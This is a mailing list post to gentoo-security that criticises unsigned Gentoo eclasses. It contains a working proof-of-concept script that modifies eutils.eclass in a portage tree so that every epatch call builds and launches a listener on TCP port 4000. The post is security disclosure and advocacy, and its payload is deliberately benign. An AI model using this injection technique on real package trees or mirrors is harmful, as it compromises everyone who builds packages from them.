| 1 |
Hi, |
| 2 |
|
| 3 |
after 1.5 years (2 years after the bug could could found in bugzilla) it |
| 4 |
seems that one of the highest security risks is closed. At least I've |
| 5 |
seen something about signed ebuilds. (see |
| 6 |
http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ). |
| 7 |
|
| 8 |
Time for the next part. I've already written a bug for that a year ago, |
| 9 |
but it was now closed a second time by "the ... gatekeeper". |
| 10 |
|
| 11 |
See bug #26110 |
| 12 |
|
| 13 |
Here's the next small script. If you are operating a gentoo mirror, or |
| 14 |
having access to one, feel free to play with it. |
| 15 |
|
| 16 |
If you are a user, the only practical way to ensure a minimum of |
| 17 |
security is to sync twice: |
| 18 |
(a) sync, |
| 19 |
(b) delete timestap, |
| 20 |
(c) sync with other mirror and |
| 21 |
(d) look if no files where different, otherwise restart with (a) |
| 22 |
|
| 23 |
----------------gentooTrojan.sh--------------------------- |
| 24 |
#!/bin/sh |
| 25 |
if [ ${#} -ne 1 ] ; then |
| 26 |
echo "This script puts a silly trojan into Gentoo's portage." |
| 27 |
echo "Usage: `basename ${0}` PathToPortage" |
| 28 |
exit 1 |
| 29 |
fi |
| 30 |
|
| 31 |
mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass |
| 32 |
sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with |
| 33 |
telnet localhost 4000.\nKill it with killall |
| 34 |
GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' |
| 35 |
<${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass |
| 36 |
cat >${1}/eclass/GentooTrojan.c << EOF |
| 37 |
#include <unistd.h> |
| 38 |
#include <sys/socket.h> |
| 39 |
#include <netinet/in.h> |
| 40 |
#include <string.h> |
| 41 |
|
| 42 |
int main(void) |
| 43 |
{ |
| 44 |
struct sockaddr_in serv; |
| 45 |
struct sockaddr_in cli; |
| 46 |
int sock; |
| 47 |
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); |
| 48 |
if (sock < 0) |
| 49 |
return 1; |
| 50 |
bzero((char *) &serv, sizeof(serv)); |
| 51 |
serv.sin_family = AF_INET; |
| 52 |
serv.sin_addr.s_addr = htonl(INADDR_ANY); |
| 53 |
serv.sin_port = htons(4000); |
| 54 |
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) |
| 55 |
return 1; |
| 56 |
if (listen(sock, 5) < 0) |
| 57 |
return 1; |
| 58 |
while (1) { |
| 59 |
int scli; |
| 60 |
int slen; |
| 61 |
static char *str="Your are listing to the famous Gentoo trojan!\n"; |
| 62 |
slen = sizeof(cli); |
| 63 |
scli = accept(sock, (struct sockaddr *) &cli, |
| 64 |
(socklen_t *) &slen); |
| 65 |
write(scli, str, strlen(str)); |
| 66 |
close(scli); |
| 67 |
} |
| 68 |
} |
| 69 |
EOF |
| 70 |
|
| 71 |
gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c |
| 72 |
|
| 73 |
echo "Done. Portage successful infected with a trojan." |
| 74 |
echo "Just emerge an ebuild which uses epatch and do a" |
| 75 |
echo " telnet localhost 4000" |
| 76 |
echo "afterwards." |
| 77 |
------------------------------------------- |
| 78 |
|
| 79 |
Kind regards, |
| 80 |
|
| 81 |
Alexander Holler |
| 82 |
|
| 83 |
|
| 84 |
PS: Please don't reply to me, I don't read any Gentoo mailing lists |
| 85 |
anymore, in fact I even don't know why I'm writting this message, as I |
| 86 |
already have lost every interest in Gentoo some time ago. |
| 87 |
|
| 88 |
PPS: Sorry for that hard words, but that all reminds me on Microsoft. |
| 89 |
The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting |
| 90 |
forgotten, ignored or fixed in the same time. |
| 91 |
|
| 92 |
PPPS: I really appreciate all the very good work on hardened gcc, |
| 93 |
selinux-profiles and so on, but for me, this all seems useless as long |
| 94 |
as the base is compromised that easy and the user has no practical way |
| 95 |
(e.g. hashs) to check what he gets on his machine with a 'sync'. |
| 96 |
|
| 97 |
-- |
| 98 |
gentoo-security@g.o mailing list |
Archives